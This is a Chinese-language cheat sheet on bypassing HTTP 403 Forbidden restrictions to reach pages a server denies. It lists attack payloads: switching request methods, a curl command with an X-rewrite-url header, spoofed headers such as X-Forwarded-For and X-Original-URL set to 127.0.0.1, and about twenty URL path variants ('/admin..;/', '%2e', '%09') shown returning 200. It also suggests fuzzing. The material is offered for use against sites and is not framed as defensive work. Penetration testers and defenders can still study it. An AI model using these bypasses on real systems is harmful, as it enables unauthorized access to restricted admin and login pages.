前言:
403 Forbidden 是HTTP 协议中的一个状态码,表示没有权限访问该网站。服务器已经处理了请求,但拒绝执行。当遇到 403 页面时,可能包含一些开发者不想让我们知道的信息。
以下我们列出几种常见的方法:
1、修改请求方法(Change requested method)
GET → POST, GET → TRACE, GET → PUT, GET → OPTION
实例如下
GET /api HTTP/1.1
Response
HTTP/1.1 403
POST /api HTTP/1.1
X-Forwared-Host: 127.0.0.1
Response
HTTP/1.1 200 OK
2、USing CURL
curl -i -s -k -X $'GET' -H $'Host: example.com' -H $'X-rewrite-url: admin/login' $'https://example.com/'
3、向请求模块添加头信息(包括但不限于 ReFerer)
ReFerer:https://xxx/auth/login
X-rewrite-url: 127.0.0.1
X-Original-URL: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
实例如下
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403
GET /auth/login HTTP/1.1
X-Forwared-Host: 127.0.0.1
Response
HTTP/1.1 200 OK
注:不局限于 127.0.0.1,可拓宽思路,比如多个子域。可以进行 FUZZ。
4、扩展名绕过(Extension bypass)
site.com/admin => 403
site.com/admin/ => 200
site.com/admin/*/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin/./. => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin?? => 200
site.com/admin%09/ => 200
site.com/admin%20/ => 200
site.com/admin/..;/ => 200
site.com/%20admin%20/ => 200
